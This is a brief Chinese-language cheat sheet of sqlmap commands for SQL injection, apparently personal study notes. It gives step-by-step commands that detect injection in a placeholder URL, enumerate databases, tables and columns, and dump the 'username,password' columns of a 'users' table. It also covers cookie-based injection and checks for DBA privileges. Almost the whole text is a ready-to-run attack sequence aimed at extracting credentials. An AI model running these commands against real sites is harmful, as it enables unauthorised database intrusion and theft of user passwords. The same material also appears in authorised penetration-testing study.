1、

【sqlmap -u  "url"】      -u：检测是否存在注入，返回数据库的名字

                                               --tables  拆解所有表名

                                                --data="例如： logil=1"

                                                --columns :猜列名          

                                                -T “users” ：猜users表

                                                -C “username,password” ：猜列明

                                               --dump：下载数据

        1、 sqlmap -u "url" 

        2、 sqlmap -u "url" --tables

        3、 sqlmap -u "url"  --columns  -T  “users”

        4、 sqlmap -u "url"   --dump  -C “username,password”   -T  “users” 

2、cookie注入

    1、 sqlmap -u "url" --cookie "id=57" --level 2  

    2、 sqlmap -u "url" --tables --cookie "id=57" --level 2  

3、php

    1、 sqlmap -u "url" --is-dba   ：检查是否有dba权限

    2、sqlmap -u "url" --is-dbs    ：列出所有数据库

    3、sqlmap -u "url"  --current-db    ：查找自己的数据库

    4、sqlmap -u "url"  --tables -D"ggec"    ：拆解ggec数据库的所有表